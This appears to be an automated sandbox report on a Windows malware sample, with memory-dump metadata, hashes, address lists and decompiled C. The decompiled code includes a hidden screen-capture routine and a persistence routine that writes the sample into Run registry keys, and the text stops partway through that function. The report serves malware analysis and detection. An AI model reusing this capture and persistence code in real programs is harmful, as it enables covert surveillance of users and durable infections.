0x105aa553
0x105aa55b
0x105aa564
0x105aa576
0x105aa579
0x105aa586
0x105aa595
0x105aa598
0x105aa5a5
0x105aa5b6
0x105aa5b9
0x105aa5c6
0x105aa5d8
0x105aa5db
0x105aa5e8
0x105aa5fa
0x105aa5fd
0x105aa60a
0x105aa616
0x105aa61d
0x105aa636
0x105aa639
0x105aa640
0x105aa656
0x105aa659
0x105aa666
0x105aa675
0x105aa67a
0x105aa681
0x105aa682
0x105aa69a
0x105aa6a1
0x105aa6a4
0x105aa6ad
0x105aa6b3
0x105aa6b6
0x105aa6bc
0x105aa6bf
0x105aa6c5
0x105aa6c8
0x105aa6ce
0x105aa6d1
0x105aa6d7
0x105aa6da
0x105aa6e0
0x105aa6e3
0x105aa6ef
0x105aa6f4
0x105aa6fa
0x105aa706
0x105aa709
0x105aa70f
0x105aa712
0x105aa718
0x105aa71b
0x105aa721
0x105aa721
0x105aa726
0x105aa73f
0x105aa749
0x105aa728
0x105aa72d
0x105aa72e
0x105aa730
0x105aa730
0x105aa755
0x105aa75e
0x105aa75e
0x105aa760
0x105aa763
0x105aa765
0x105aa76b
0x105aa76e
0x105aa774
0x105aa777
0x105aa777
0x105aa3cd
0x105aa789

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75bcb6980a201f2a5bc31736a7ab49307c6c83ed7787d014a64e3337eb0cdef7
Instruction ID: 3d29b3e44f190215b20092cd88e611e53d59491e18ac6e4cd88c6401b52a7bbd
Opcode Fuzzy Hash: 75bcb6980a201f2a5bc31736a7ab49307c6c83ed7787d014a64e3337eb0cdef7
Instruction Fuzzy Hash: 26B18229115A939ACB01EF29C0913F17BA1EF6A304F1890B9DC9CCFB57E7256412EB64

Uniqueness

Uniqueness Score: -1.00%

Function 00419521, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87fbe7bf7bf54041e8de41a6fd51e618a094b94f8abcd9874f2157c003b73034
Instruction ID: b026397cdc5a2788a8846e4ec5f60ec3cbb44c94b97407c66bc8dff9a88f8d49
Opcode Fuzzy Hash: 87fbe7bf7bf54041e8de41a6fd51e618a094b94f8abcd9874f2157c003b73034
Instruction Fuzzy Hash: F6B18179524A929AC701AF29C0A13F17BA1FF6A304F1850B9DC98CFB57E3295412EB64

Uniqueness

Uniqueness Score: -1.00%

Function 0043843A, Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b115038f7e4976344a74245cac352abb538fa6c5ac7dc22365ff8df30af6da
Instruction ID: b367387755e38c2acd2464c16e73056793f51d4de4b8bca9bcadcc32440fe761
Opcode Fuzzy Hash: 21b115038f7e4976344a74245cac352abb538fa6c5ac7dc22365ff8df30af6da
Instruction Fuzzy Hash: 84615B7120070A77DE389A2888927BFE3949B6D304F14391FF942DB781EE1DDD42825E

Uniqueness

Uniqueness Score: -1.00%

Function 00437FDC, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 734bcd308261c39c15bc3b1bbc171b3f1001009be4a085e5c990ae6d9ed5feda
Instruction ID: 16784fe19e2edb84f1e2eabff14cd8590e9d4ff84b89519e55d6fc4a3164caeb
Opcode Fuzzy Hash: 734bcd308261c39c15bc3b1bbc171b3f1001009be4a085e5c990ae6d9ed5feda
Instruction Fuzzy Hash: A251047120074456DF3C49688956BBFE3A59B1E344F19390FF9828B382CE4D9D4A925E

Uniqueness

Uniqueness Score: -1.00%

Function 105B3F06, Relevance: .2, Instructions: 195
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E105B3F06(void* __ecx, signed int __edx, signed int _a4, void* _a8, unsigned int _a12, void* _a16, int _a20) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v64;
				unsigned int _t115;
				signed int _t146;
				unsigned int _t147;
				unsigned int _t149;
				unsigned int _t150;
				signed int* _t156;
				signed int _t160;
				signed int _t169;
				signed int _t179;

				_v12 = __edx;
				asm("xorps xmm0, xmm0");
				asm("movsd");
				asm("movlpd [ebp-0x1c], xmm0");
				asm("movlpd [ebp-0x14], xmm0");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				E105B316D( &_v64,  &_v64);
				_t146 = _a4;
				if(_t146 == 0) {
					L7:
					_t147 = _a12;
					if(_t147 == 0) {
						L15:
						_t179 = _a4;
						_v28 = _v28 ^ (0 << 0x00000020 | _t179) << 0x3;
						_v20 = _v20 ^ (0 << 0x00000020 | _t147) << 0x3;
						_t156 =  &_v32;
						_v32 = _v32 ^ _t179 << 0x00000003;
						_v24 = _v24 ^ _t147 << 0x00000003;
						E105B3DC3(_t156,  &_v64);
						_push(_t156);
						E105B316D( &_v32,  &_v32);
						return E105C334E(_a16,  &_v32, _a20);
					}
					_t183 = _a8;
					if(_a8 == 0) {
						goto L15;
					}
					_t160 = _t147 & 0x0000000f;
					_t115 = _t147 >> 4;
					_v12 = _t160;
					if(_t115 == 0) {
						L13:
						if(_t160 != 0) {
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							E105C334E( &_v48, _t183, _t160);
							E105B316D( &_v48,  &_v48);
							_v32 = _v32 ^ _v48;
							_v28 = _v28 ^ _v44;
							_v24 = _v24 ^ _v40;
							_v20 = _v20 ^ _v36;
							E105B3DC3( &_v32,  &_v64);
						}
						goto L15;
					}
					_t149 = _t115;
					do {
						_push(_t160);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E105B316D( &_v48,  &_v48);
						_v32 = _v32 ^ _v48;
						_v28 = _v28 ^ _v44;
						_v24 = _v24 ^ _v40;
						_v20 = _v20 ^ _v36;
						_t160 =  &_v32;
						E105B3DC3(_t160,  &_v64);
						_t183 = _a8 + 0x10;
						_a8 = _a8 + 0x10;
						_t149 = _t149 - 1;
					} while (_t149 != 0);
					_t147 = _a12;
					_t160 = _v12;
					goto L13;
				}
				_t189 = _v12;
				if(_v12 == 0) {
					goto L7;
				}
				_t150 = _t146 >> 4;
				_t169 = _t146 & 0x0000000f;
				_v16 = _t169;
				if(_t150 == 0) {
					L5:
					if(_t169 != 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						E105C334E( &_v48, _t189, _t169);
						E105B316D( &_v48,  &_v48);
						_v32 = _v32 ^ _v48;
						_v28 = _v28 ^ _v44;
						_v24 = _v24 ^ _v40;
						_v20 = _v20 ^ _v36;
						E105B3DC3( &_v32,  &_v64);
					}
					goto L7;
				} else {
					goto L3;
				}
				goto L5;
				L3:
				_push(_t169);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				E105B316D( &_v48,  &_v48);
				_v32 = _v32 ^ _v48;
				_v28 = _v28 ^ _v44;
				_v24 = _v24 ^ _v40;
				_v20 = _v20 ^ _v36;
				_t169 =  &_v32;
				E105B3DC3(_t169,  &_v64);
				_t189 = _v12 + 0x10;
				_v12 = _v12 + 0x10;
				_t150 = _t150 - 1;
				if(_t150 != 0) {
					goto L3;
				} else {
					_t169 = _v16;
					goto L5;
				}
			}

0x105b3f15
0x105b3f1b
0x105b3f1e
0x105b3f25
0x105b3f2a
0x105b3f2f
0x105b3f30
0x105b3f31
0x105b3f32
0x105b3f37
0x105b3f3d
0x105b3fee
0x105b3fee
0x105b3ff3
0x105b40ab
0x105b40ab
0x105b40ba
0x105b40bd
0x105b40c0
0x105b40c6
0x105b40cf
0x105b40d2
0x105b40da
0x105b40dd
0x105b40fb
0x105b40fb
0x105b3ff9
0x105b3ffe
0x00000000
0x00000000
0x105b4008
0x105b400b
0x105b400e
0x105b4013
0x105b4063
0x105b4065
0x105b406c
0x105b406f
0x105b4070
0x105b4071
0x105b4076
0x105b4082
0x105b408d
0x105b4093
0x105b4099
0x105b409f
0x105b40a6
0x105b40a6
0x00000000
0x105b4065
0x105b4015
0x105b4017
0x105b401f
0x105b4022
0x105b4023
0x105b4024
0x105b4025
0x105b4026
0x105b4031
0x105b4037
0x105b403d
0x105b4043
0x105b4047
0x105b404a
0x105b4052
0x105b4055
0x105b4058
0x105b4058
0x105b405d
0x105b4060
0x00000000
0x105b4060
0x105b3f43
0x105b3f48
0x00000000
0x00000000
0x105b3f50
0x105b3f53
0x105b3f56
0x105b3f5b
0x105b3fa6
0x105b3fa8
0x105b3faf
0x105b3fb2
0x105b3fb3
0x105b3fb4
0x105b3fb9
0x105b3fc5
0x105b3fd0
0x105b3fd6
0x105b3fdc
0x105b3fe2
0x105b3fe9
0x105b3fe9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x105b3f5d
0x105b3f65
0x105b3f68
0x105b3f69
0x105b3f6a
0x105b3f6b
0x105b3f6c
0x105b3f77
0x105b3f7d
0x105b3f83
0x105b3f89
0x105b3f8d
0x105b3f90
0x105b3f98
0x105b3f9b
0x105b3f9e
0x105b3fa1
0x00000000
0x105b3fa3
0x105b3fa3
0x00000000
0x105b3fa3

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
Instruction ID: 59f0c5b3463a5286e95d29dcdc162ce190a1261c66b0dd597203b9ceb6d88ea5
Opcode Fuzzy Hash: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
Instruction Fuzzy Hash: 9161EC35E0060A9FDF08CFB9D4859EFBBB6EF8C210F11C529E526BB151DA746A058B90

Uniqueness

Uniqueness Score: -1.00%

Function 00423098, Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
Instruction ID: 6a2ad8edffecebfcaae903e9719156c7a0c76254d9b187d9e67c469d6c3393be
Opcode Fuzzy Hash: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
Instruction Fuzzy Hash: CB613C31E0021AABDF08DFB9D5815EFB7B2FF8C304F50812AE425BB250DA746A058B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F15D, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
Instruction ID: 7a46c63e6297807c5de7f1130092129a1d39734970edeb025e6968c5830d1d5b
Opcode Fuzzy Hash: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
Instruction Fuzzy Hash: 8F315A75A00115AFCB20CF59CD81B5AB7A9FF48354F1580B6ED04AB382D375EA64CB98

Uniqueness

Uniqueness Score: -1.00%

Function 105C24DE, Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E105C24DE(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										return _t39 - 4;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											return _t39 - 3;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												return _t39 - 2;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						return _t39 - 1;
					}
				}
				L24:
			}

0x105c24de
0x105c24e5
0x105c253a
0x105c253a
0x105c24e7
0x105c24e7
0x105c24ed
0x105c24f7
0x105c250f
0x105c250f
0x105c2512
0x105c2526
0x105c2526
0x105c2529
0x00000000
0x105c252b
0x105c252b
0x105c252b
0x105c252d
0x105c2532
0x00000000
0x00000000
0x105c2534
0x105c2537
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x105c2537
0x00000000
0x105c252b
0x105c2514
0x105c2521
0x105c2540
0x105c2542
0x105c2550
0x105c2559
0x00000000
0x105c255b
0x105c255e
0x105c2560
0x105c258a
0x105c2562
0x105c2562
0x105c2564
0x105c2584
0x105c2566
0x105c2569
0x105c256b
0x105c257e
0x105c256d
0x105c256f
0x00000000
0x105c2571
0x00000000
0x105c2571
0x105c256f
0x105c256b
0x105c2564
0x105c2560
0x00000000
0x105c253b
0x105c253b
0x105c253b
0x00000000
0x105c2525
0x105c24f9
0x105c24f9
0x105c24f9
0x105c24fb
0x105c2500
0x00000000
0x00000000
0x105c2502
0x105c2505
0x00000000
0x105c2507
0x105c250d
0x00000000
0x00000000
0x00000000
0x00000000
0x105c250d
0x00000000
0x105c2505
0x105c2574
0x105c2578
0x105c2578
0x105c24f7
0x00000000

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 03a296429e40b14eb78bb5bf5163ec856226d00c4aced2ee7a188afee175d477
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 1E115BF7A4004243D684C9E9E6F03B7AFAEEBC51E0729537AD04A4F658D522D9419600

Uniqueness

Uniqueness Score: -1.00%

Function 00431670, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: f68e5f41fa18727e6a735129a3979a796d7c5d5db83d10118ba36f39fff963d2
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: F2113D7724018143D61486BEC9B95B7A3D5EBCE321F2D637BD0424B778D32AD945950C

Uniqueness

Uniqueness Score: -1.00%

Function 00414906, Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 298
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00414906(void* __ecx, char __edx, void* __eflags, signed int _a4) {
				void* _v12;
				char _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				int _v36;
				struct HDC__* _v40;
				void* _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				char _v80;
				intOrPtr _v84;
				struct tagCURSORINFO _v100;
				signed int _v106;
				signed int _v108;
				long _v116;
				long _v120;
				char _v124;
				struct _ICONINFO _v144;
				char _v168;
				void* __ebx;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t120;
				int _t127;
				void* _t128;
				signed char _t140;
				long _t146;
				void* _t147;
				int _t149;
				void* _t157;
				void* _t186;
				void* _t188;
				void* _t194;
				int _t199;
				void* _t204;
				void* _t223;
				signed int _t226;
				struct HDC__* _t228;
				struct HDC__* _t232;
				struct tagBITMAPINFO* _t234;
				void* _t235;
				int _t241;

				_v13 = __edx;
				_t194 = __ecx;
				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
				_v20 = _t232;
				_t228 = CreateCompatibleDC(_t232);
				_v40 = _t228;
				_v32 = E00414D3D( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t114 = E00414D89( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t199 = _v32;
				_v36 = _t114;
				if(_t199 != 0 || _t114 != 0) {
					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
					_v12 = _t115;
					__eflags = _t115;
					if(_t115 != 0) {
						_t116 = SelectObject(_t228, _t115);
						__eflags = _t116;
						if(_t116 != 0) {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							E00414DCA( *((intOrPtr*)(0x46bd78 + _a4 * 4)),  &_v28);
							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L7;
							}
							__eflags = _v13;
							if(_v13 != 0) {
								_v100.cbSize = 0x14;
								_t186 = GetCursorInfo( &_v100);
								__eflags = _t186;
								if(_t186 != 0) {
									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
									__eflags = _t188;
									if(_t188 != 0) {
										_t241 = _v84 - _v144.yHotspot - _v24;
										__eflags = _t241;
										DeleteObject(_v144.hbmColor);
										DeleteObject(_v144.hbmMask);
										_t228 = _v40;
										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
										_t232 = _v20;
									}
								}
							}
							_push( &_v124);
							_t127 = 0x18;
							_t128 = GetObjectA(_v12, _t127, ??);
							__eflags = _t128;
							if(_t128 == 0) {
								goto L7;
							} else {
								_t226 = _v106 * _v108 & 0x0000ffff;
								__eflags = _t226 - 1;
								if(_t226 != 1) {
									_push(4);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t234 = LocalAlloc(0x40, ??);
										_t204 = 0x18;
										_t234->bmiHeader = 0x28;
										_t234->bmiHeader.biWidth = _v120;
										_t234->bmiHeader.biHeight = _v116;
										_t234->bmiHeader.biPlanes = _v108;
										_t234->bmiHeader.biBitCount = _v106;
										_t140 = _a4;
										__eflags = _t140 - _t204;
										if(_t140 < _t204) {
											__eflags = 1;
											_t234->bmiHeader.biClrUsed = 1 << _t140;
										}
										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t227 = _t226 & 0x00000007;
										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
										_t234->bmiHeader.biSizeImage = _t146;
										_t147 = GlobalAlloc(0, _t146);
										_a4 = _t147;
										__eflags = _t147;
										if(_t147 != 0) {
											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
											__eflags = _t149;
											if(_t149 != 0) {
												_v56 = 0x4d42;
												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												_v50 = 0;
												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t157;
												_v46 = _t157;
												E004020D5(_t194,  &_v80);
												E004020D5(_t194,  &_v168);
												E0040251D(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
												E00403436( &_v80);
												E0040251D(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
												E00403436( &_v80);
												_t235 = _a4;
												E0040251D(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
												E00403436( &_v80);
												DeleteObject(_v12);
												GlobalFree(_t235);
												DeleteDC(_v20);
												DeleteDC(_t228);
												E00402044(_t194, _t194, __eflags,  &_v168);
												E00401FC7();
												E00401FC7();
												goto L32;
											}
											DeleteDC(_v20);
											DeleteDC(_t228);
											DeleteObject(_v12);
											GlobalFree(_a4);
											goto L2;
										} else {
											_push(_v20);
											L8:
											DeleteDC();
											DeleteDC(_t228);
											_push(_v12);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_t223 = 0x18;
									__eflags = _t226 - _t223;
									if(_t226 > _t223) {
										_push(0x20);
										_pop(1);
										L23:
										_a4 = 1;
										goto L24;
									}
									_a4 = _t223;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						_push(_t232);
						goto L8;
					} else {
						DeleteDC(_t232);
						DeleteDC(_t228);
						_push(0);
						L5:
						DeleteObject();
						goto L2;
					}
				} else {
					L2:
					E00402084(_t194, _t194, 0x45f6bc);
					L32:
					return _t194;
				}
			}

0x00414914
0x0041491f
0x00414927
0x0041492a
0x00414936
0x00414938
0x00414947
0x00414954
0x00414959
0x0041495c
0x00414961
0x0041497b
0x00414981
0x00414984
0x00414986
0x004149a0
0x004149a6
0x004149a8
0x004149c1
0x004149c5
0x004149d0
0x004149f0
0x004149f6
0x004149f8
0x00000000
0x00000000
0x004149fa
0x004149fe
0x00414a03
0x00414a0b
0x00414a11
0x00414a13
0x00414a1f
0x00414a25
0x00414a27
0x00414a41
0x00414a41
0x00414a44
0x00414a4d
0x00414a58
0x00414a5c
0x00414a62
0x00414a62
0x00414a27
0x00414a13
0x00414a68
0x00414a6b
0x00414a70
0x00414a76
0x00414a78
0x00000000
0x00414a7e
0x00414a85
0x00414a8b
0x00414a8e
0x00414a94
0x00414a96
0x00414a97
0x00414a9a
0x00414a9d
0x00414aca
0x00414aca
0x00414ad3
0x00414ad4
0x00414adc
0x00414ae0
0x00414ae1
0x00414aea
0x00414af0
0x00414af7
0x00414aff
0x00414b03
0x00414b06
0x00414b09
0x00414b10
0x00414b12
0x00414b12
0x00414b1e
0x00414b22
0x00414b26
0x00414b27
0x00414b35
0x00414b3c
0x00414b3f
0x00414b45
0x00414b48
0x00414b4a
0x00414b63
0x00414b69
0x00414b6b
0x00414b98
0x00414bac
0x00414bb1
0x00414bbc
0x00414bbc
0x00414bc2
0x00414bc5
0x00414bd0
0x00414bde
0x00414bed
0x00414bf8
0x00414c07
0x00414c0f
0x00414c16
0x00414c25
0x00414c2d
0x00414c34
0x00414c43
0x00414c46
0x00414c51
0x00414c5c
0x00414c64
0x00000000
0x00414c64
0x00414b76
0x00414b79
0x00414b7e
0x00414b88
0x00000000
0x00414b4c
0x00414b4c
0x004149ab
0x004149b1
0x004149b4
0x004149b6
0x00000000
0x004149b6
0x00414b4a
0x00414a9f
0x00414aa1
0x00414aa2
0x00414aa5
0x00414aa8
0x00000000
0x00000000
0x00414aaa
0x00414aac
0x00414aad
0x00414ab0
0x00414ab3
0x00000000
0x00000000
0x00414ab7
0x00414ab8
0x00414abb
0x00414ac4
0x00414ac6
0x00414ac7
0x00414ac7
0x00000000
0x00414ac7
0x00414abd
0x00414ac0
0x00000000
0x00414ac0
0x00000000
0x00414a90
0x00414a78
0x004149aa
0x004149aa
0x00000000
0x00414988
0x0041498f
0x00414992
0x00414994
0x00414996
0x00414996
0x00000000
0x00414996
0x00414967
0x00414967
0x0041496e
0x00414c6b
0x00414c71
0x00414c71

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
CreateCompatibleDC.GDI32(00000000), ref: 0041492D

Part of subcall function 00414D3D: GetMonitorInfoW.USER32(?,?), ref: 00414D5D

Part of subcall function 00414D89: GetMonitorInfoW.USER32(?,?), ref: 00414DA9

CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041497B
DeleteDC.GDI32(00000000), ref: 0041498F
DeleteDC.GDI32(00000000), ref: 00414992
DeleteObject.GDI32(?), ref: 00414996
SelectObject.GDI32(00000000,00000000), ref: 004149A0
DeleteDC.GDI32(00000000), ref: 004149B1
DeleteDC.GDI32(00000000), ref: 004149B4
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 004149F0
GetCursorInfo.USER32(?,?,?), ref: 00414A0B
GetIconInfo.USER32(?,?), ref: 00414A1F
DeleteObject.GDI32(?), ref: 00414A44
DeleteObject.GDI32(?), ref: 00414A4D
DrawIcon.USER32 ref: 00414A5C
GetObjectA.GDI32(?,00000018,?), ref: 00414A70
LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00414AD6
GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 00414B3F
GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00414B63
DeleteDC.GDI32(?), ref: 00414B76
DeleteDC.GDI32(00000000), ref: 00414B79
DeleteObject.GDI32(?), ref: 00414B7E
GlobalFree.KERNEL32 ref: 00414B88
DeleteObject.GDI32(?), ref: 00414C2D
GlobalFree.KERNEL32 ref: 00414C34
DeleteDC.GDI32(?), ref: 00414C43
DeleteDC.GDI32(00000000), ref: 00414C46

Strings

DISPLAY, xrefs: 0041491A

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
String ID: DISPLAY
API String ID: 517350757-865373369
Opcode ID: 6ff8cbcc277d7720571f848809e7628165d438946616432f88157e7f1d5e0bb6
Instruction ID: 04b928e990297c4dc387ef5bf1f87de0b325f6e157068eb4714aaf8e6101e2a9
Opcode Fuzzy Hash: 6ff8cbcc277d7720571f848809e7628165d438946616432f88157e7f1d5e0bb6
Instruction Fuzzy Hash: 1DB17171900319AFDB10DFA0DC45BEEBBB8EF44756F00402AF949E7290DB74AA45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0E2, Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 280
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040B0E2(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;

				E0041015B();
				if( *0x46a9d4 != 0x30) {
					E00409D73();
				}
				_t243 =  *0x46bd6b - 1; // 0x0
				if(_t243 == 0) {
					E0041537E(_t243);
				}
				if( *0x46ba75 != 0) {
					E00417754(E00401EEB(0x46c0e0));
				}
				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t245 =  *0x46bb02 - 1; // 0x1
				if(_t245 == 0) {
					E00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EEB(0x46c4e8));
				}
				_t246 =  *0x46bafb - 1; // 0x0
				if(_t246 == 0) {
					E00410D5C(0x80000002, _t231, E00401EEB(0x46c4e8));
				}
				_t247 =  *0x46bb00 - 1; // 0x0
				if(_t247 == 0) {
					E00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EEB(0x46c4e8));
